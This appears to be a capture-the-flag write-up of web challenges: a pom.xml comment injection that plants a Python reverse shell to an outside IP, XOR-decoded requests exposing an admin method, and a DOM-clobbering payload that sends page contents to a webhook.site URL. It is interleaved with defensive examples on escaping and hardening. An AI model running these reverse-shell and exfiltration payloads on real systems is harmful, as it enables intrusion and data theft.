Add a comment in the text node of the plugin configuration in the pom.xml file. The comment breaks out of the surrounding elements, adds a new plugin that executes a reverse shell, and its trailing <!-- comments out the remainder of the original file.
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-surefire-plugin</artifactId>
<version>2.22.2</version>
<configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>exec-maven-plugin</artifactId>
<version>1.3.2</version>
<executions>
<execution>
<id>s1r1us</id>
<goals>
<goal>exec</goal>
</goals>
<phase>initialize</phase>
<configuration>
<executable>python</executable>
<arguments>
<argument>-c</argument>
<argument>import sys,socket,os,pty;s=socket.socket();s.connect(("123.12.12.123",1337));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")</argument>
</arguments>
</configuration>
</execution>
</executions>
</plugin></plugins></build></project><!--
<forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds>
</configuration>
</plugin>
</plugins>
</build>
</project> // -->
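The root cause is that the comment is written into an XML text node without escaping, so `</configuration>` and `<!--` inside it become markup. The following is an added example (not the challenge's code and not part of Maven; the helper names are hypothetical) that renders the same surefire block with and without escaping and counts how many plugin elements the resulting document contains. The injected comment is a constructed placeholder with the shape of the injection above, not the real payload.

```javascript
// Added example (not from the challenge or from Maven): rendering an
// untrusted "comment" into a pom.xml text node. Helper names are hypothetical.

// Escape the characters that can start or end markup in XML text.
function escapeXmlText(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&apos;");
}

// Write the surefire plugin block with the user comment in the
// <configuration> text node. escape=false is the vulnerable pattern that
// lets the comment break out of the element; escape=true is the fix.
function renderPom(userComment, escape) {
  const text = escape ? escapeXmlText(userComment) : String(userComment);
  return [
    "<project><build><plugins>",
    "<plugin>",
    "<groupId>org.apache.maven.plugins</groupId>",
    "<artifactId>maven-surefire-plugin</artifactId>",
    "<version>2.22.2</version>",
    "<configuration>" + text,
    "<forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds>",
    "</configuration>",
    "</plugin>",
    "</plugins></build></project>",
  ].join("\n");
}

// In well-formed XML a literal "<" only ever opens markup, so the number of
// "<plugin>" start tags equals the number of plugin elements Maven would see.
function countPluginElements(pom) {
  return (pom.match(/<plugin>/g) || []).length;
}

// Constructed payload with the same shape as the injection above: close the
// open elements, append a second plugin, and open a comment that swallows the
// rest of the file. The plugin body is a placeholder, not the real payload.
const INJECTED_COMMENT =
  "</configuration></plugin>" +
  "<plugin><artifactId>injected-plugin</artifactId></plugin>" +
  "<!--";

// How many plugins the build would contain with and without escaping.
function compare(comment) {
  return {
    unescaped: countPluginElements(renderPom(comment, false)),
    escaped: countPluginElements(renderPom(comment, true)),
  };
}

console.log(compare(INJECTED_COMMENT)); // { unescaped: 2, escaped: 1 }
```

With escaping the comment stays a single text node, the `<!--` never opens a comment, and the build keeps exactly the one plugin the template declares.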
The POST data is XORed with the key 'szefuSecurePassword2021'. Decode the data and you will notice a method named getUsersDev, which gives the admin password.
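XOR with a key that ships to the client is obfuscation, not confidentiality: whoever can read the page script can decode every request. The following is an added example (not the challenge's code) that applies the key quoted above; it assumes, since the page does not say, that the body is the UTF-8 JSON bytes XORed with the key repeated to the body length, and the sample request is constructed.

```javascript
// Added example (not from the challenge): repeating-key XOR as applied to the
// POST body. Assumed, since the page does not say: the body is the UTF-8
// JSON bytes XORed with the key repeated to the body length.

const PAGE_KEY = "szefuSecurePassword2021"; // the key quoted in the writeup

// XOR every byte with the key byte at the same position modulo key length.
// Applying it twice with the same key restores the input.
function xorWithKey(bytes, key) {
  const k = Buffer.from(key, "utf8");
  if (k.length === 0) throw new Error("empty key");
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ k[i % k.length];
  return out;
}

// What the client does before sending: JSON -> bytes -> XOR.
function encodeBody(obj, key = PAGE_KEY) {
  return xorWithKey(Buffer.from(JSON.stringify(obj), "utf8"), key);
}

// What anyone holding the (client-side, therefore public) key can do with a
// captured request: XOR -> bytes -> JSON.
function decodeBody(buf, key = PAGE_KEY) {
  return JSON.parse(xorWithKey(buf, key).toString("utf8"));
}

// Constructed sample request, shaped like the one the writeup refers to.
const SAMPLE_REQUEST = { method: "getUsersDev", params: [] };

const wire = encodeBody(SAMPLE_REQUEST);
console.log(wire.toString("hex"));
console.log(decodeBody(wire).method); // getUsersDev
```

Because the same function encodes and decodes, a single captured request plus the key recovers the plaintext; a server that exposes privileged methods must enforce authorization on the method itself rather than rely on the body being unreadable.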
The CSP can be bypassed by adding a base tag.
This is a nice puzzle: using DOM clobbering we manipulate the DOM and add the nonce to our script tag. I got first blood for this challenge. Add the HTML below as a note.
<pwning urll>ends
st98
<base href=a:abc><a id=good1 href="https://ctf.s1r1us.ninja/static/badwords.js?">ad</a>
<a id=bad1 href="urll">ab</a>
<base href=a:abc><a id=good3 href=">fetch('http://politernotepad.zajebistyc.tf/').then(x=>x.text()).then(x=>{a=btoa(encodeURIComponent(x));location='https://webhook.site/2b34b951-cc1a-4c17-b48b-bc5dc1faf52f?a='+a})//">ad</a>
<a id=bad3 href="src= https://ctf.s1r1us.ninja/static/badwords.js">ab</a>
<base href=a:abc><a id=good4 href="</script>">ad</a>
<a id=bad4 href="ends">ab</a>
<base href=a:abc><a id=bad2 href="<pwning">ad</a>
<a id=good2 href="
The final note looks like this:
<html>
<head>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<title>Note</title>
</head>
<body>
<body>
<div id="content">
<pwning urll>ends
st98
<base href=a:abc><a id=good1 href="https://ctf.s1r1us.ninja/static/badwords.js?">ad</a>
<a id=bad1 href="urll">ab</a>
<base href=a:abc><a id=good3 href=">fetch('http://politernotepad.zajebistyc.tf/').then(x=>x.text()).then(x=>{a=btoa(encodeURIComponent(x));location='https://webhook.site/2b34b951-cc1a-4c17-b48b-bc5dc1faf52f?a='+a})//">ad</a>
<a id=bad3 href="src= https://ctf.s1r1us.ninja/static/badwords.js">ab</a>
<base href=a:abc><a id=good4 href="</script>">ad</a>
<a id=bad4 href="ends">ab</a>
<base href=a:abc><a id=bad2 href="<pwning">ad</a>
<a id=good2 href="
</div>
<script nonce=oNl8FB0B_pDXSnjjRlaf-Q src="http://politernotepad.zajebistyc.tf/static/badwords.js" integrity="sha384-1UV2mnC+iV6gBvv4glb0sAC2atcScwkpEzz5GN3WmVgok8MckQ1yn74acklRk0uo">
</script>
<script nonce=oNl8FB0B_pDXSnjjRlaf-Q>
console.log(1)
var footer = 'if you see anything impolite in this page please <a href="'+document.referrer+'">go back</a>';
footer = '<div>'+footer+'</div>';
content = $('#content').html();
content += footer;
content = content.replaceAll(bad1, good1);
content = content.replaceAll(bad2, good2);
content = content.replaceAll(bad3, good3);
content = content.replaceAll(bad4, good4);
console.log(content);
$('#content').html(content);
</script>
</div>
</body>
</html>
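The page script above reads bad1, good1 and the other tokens as implicit globals, so any element in the note carrying that id shadows them, and an anchor element stringifies to its href, which is why replaceAll ends up inserting attacker-chosen markup. The following is an added example, not the challenge's code, of the hardened counterpart: the rules are a local frozen constant, every token must be a plain string before it is used, and document.referrer is attribute-escaped before being concatenated into the footer. The rule pairs, the sample note text and the stand-in clobbered object are constructed for this example.

```javascript
// Added example, not the challenge's code: a hardened version of the note
// page's footer script. Rules are local constants rather than globals looked
// up by name, tokens must be real strings, and the referrer is escaped.

// Explicit, immutable rules (constructed pairs for this example).
const REPLACEMENT_RULES = Object.freeze([
  ["urll", "url"],
  ["ends", "end"],
]);

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Apply the rules; refuse anything that is not a plain string, which is what
// a clobbered global (an Element) would be.
function applyReplacements(content, rules) {
  let out = String(content);
  for (const [from, to] of rules) {
    if (typeof from !== "string" || typeof to !== "string") {
      throw new TypeError("replacement rule is not a string pair");
    }
    out = out.split(from).join(to);
  }
  return out;
}

// Same footer as the page, with the referrer escaped for the href attribute.
function buildFooter(referrer) {
  return '<div>if you see anything impolite in this page please <a href="' +
    escapeAttr(referrer) + '">go back</a></div>';
}

// Stand-in for an element that clobbered a global: like an anchor element,
// it is an object whose string form is whatever href it was given.
const CLOBBERED = { toString: () => "injected text" };

function demo() {
  const note = applyReplacements("a urll ends here", REPLACEMENT_RULES) +
    buildFooter('https://example.test/?q="x"');
  let rejected = false;
  try {
    applyReplacements("x", [[CLOBBERED, "y"]]);
  } catch (e) {
    rejected = e instanceof TypeError;
  }
  return { note, rejected };
}

console.log(demo());
```

In the original script `replaceAll(bad2, good2)` silently coerces the clobbered element to its href; here the type check turns that into an error before any markup is built, and the local rules leave nothing for an id in the note to shadow.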